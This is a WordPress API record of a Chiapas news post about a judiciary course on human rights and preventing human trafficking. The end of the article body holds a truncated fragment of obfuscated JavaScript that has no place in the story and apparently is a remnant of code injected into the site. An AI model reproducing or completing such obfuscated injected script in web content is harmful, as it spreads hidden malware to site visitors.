{"id":3012,"date":"2022-06-18T03:35:13","date_gmt":"2022-06-18T03:35:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3012"},"modified":"2022-06-18T03:35:14","modified_gmt":"2022-06-18T03:35:14","slug":"imparte-poder-judicial-curso-en-derechos-humanos-y-prevencion-de-trata-de-personas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3012","title":{"rendered":"Imparte Poder Judicial curso en Derechos Humanos y Prevenci\u00f3n de Trata de Personas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"640\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-17-at-1.07.31-PM-1024x640.jpeg\" alt=\"\" class=\"wp-image-3013\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-17-at-1.07.31-PM-1024x640.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-17-at-1.07.31-PM-300x188.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-17-at-1.07.31-PM-768x480.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/WhatsApp-Image-2022-06-17-at-1.07.31-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>17 de Junio del 2022. El Poder Judicial del Estado, encabezado por el magistrado presidente Juan \u00d3scar Trinidad Palacios, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, en coordinaci\u00f3n con Comisi\u00f3n Nacional de Derechos Humanos, llev\u00f3 a cabo el curso Derechos Humanos y Prevenci\u00f3n de la Trata de Personas. Importancia de la identificaci\u00f3n de las V\u00edctimas para la Protecci\u00f3n de sus Derechos.El curso estuvo a cargo de la jefa de departamento en la Direcci\u00f3n General de Educaci\u00f3n en Derechos Humanos, Ver\u00f3nica Itzel Nava Landa, y tuvo una duraci\u00f3n de siete horas que se repartieron en dos d\u00edas, y se brind\u00f3 un certificado de participaci\u00f3n a las y los servidores p\u00fablicos que estuvieron presentes.Esta capacitaci\u00f3n se realiz\u00f3 en la modalidad en l\u00ednea estuvo enfocada a las y los servidores p\u00fablicos del Poder Judicial del Estado que puede tener un acercamiento con personas v\u00edctimas, como lo pueden ser el personal de juzgados, defensor\u00eda, Centro de Justicia Alternativa (CEJA) y otras direcciones, teniendo un alcance de 200 participantes.Con esta capacitaci\u00f3n, el Poder Judicial del Estado refrenda su compromiso en buscar la actualizaci\u00f3n y profesionalizaci\u00f3n constante de las personas servidores p\u00fablicas, con la finalidad de poder brindar un mejor servicio a las y los chiapanecos.Direcci\u00f3n de Comunicaci\u00f3n Social y Relaciones P\u00fablicas61 7 87 00 Ext. 8020\/8021 f : \/poderjudicial.chiapas t : @PJE_Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>17 de Junio del 2022. El Poder Judicial del Estado, encabezado por el magistrado presidente Juan \u00d3scar Trinidad Palacios, a trav\u00e9s del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, en coordinaci\u00f3n con Comisi\u00f3n Nacional de Derechos Humanos, llev\u00f3 a cabo el curso Derechos Humanos y Prevenci\u00f3n de la Trata de Personas. Importancia de la identificaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3013,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3012","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3012","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3012"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3012\/revisions"}],"predecessor-version":[{"id":3014,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3012\/revisions\/3014"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3013"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3012"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3012"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3012"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}